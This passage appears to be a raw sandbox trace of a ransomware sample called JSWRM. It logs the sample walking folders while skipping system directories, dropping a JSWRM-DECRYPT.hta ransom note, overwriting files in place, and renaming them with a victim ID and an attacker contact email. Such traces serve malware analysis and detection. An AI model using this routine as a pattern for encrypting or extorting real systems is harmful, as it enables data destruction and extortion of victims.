dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.773] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.773] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.773] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1031", cAlternateFileName="")) returned 1 [0058.773] lstrcmpiW (lpString1="1031", lpString2=".") returned 1 [0058.773] lstrcmpiW (lpString1="1031", lpString2="..") returned 1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="...") returned 1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="windows") returned -1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="recovery") returned -1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="perflogs") returned -1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="documents and settings") returned -1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="$RECYCLE.BIN") returned 1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="system volume information") returned -1 [0058.774] lstrcmpiW (lpString1="1031", lpString2="msocache") returned -1 [0058.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0058.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0058.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0058.774] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1031\\jswrm-decrypt.hta")) returned 0xffffffff [0058.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0058.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0058.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0058.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0058.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.775] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1031\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.777] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.777] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.778] CloseHandle (hObject=0x450) returned 1 [0058.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0058.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0058.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0058.779] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1031\\jswrm-decrypt.hta")) returned 0x20 [0058.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0058.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.779] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19b2f838, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232200 [0058.779] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.779] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19b2f838, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.779] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.779] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.779] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.779] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0058.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0058.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0058.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.780] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.780] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3419) returned 1 [0058.780] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd50) returned 0x23dc88 [0058.780] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xd50, lpOverlapped=0x0) returned 1 [0058.782] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.782] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xd50, lpOverlapped=0x0) returned 1 [0058.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.782] CloseHandle (hObject=0x3d4) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0058.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0058.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.783] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0058.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.784] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b0974e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19b0974e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19b2f838, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.784] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.785] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.785] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0058.785] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.786] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=82346) returned 1 [0058.786] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x141a0) returned 0x2471a8 [0058.786] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x141a0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x141a0, lpOverlapped=0x0) returned 1 [0058.833] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.833] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x141a0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x141a0, lpOverlapped=0x0) returned 1 [0058.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.834] CloseHandle (hObject=0x3d4) returned 1 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0058.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 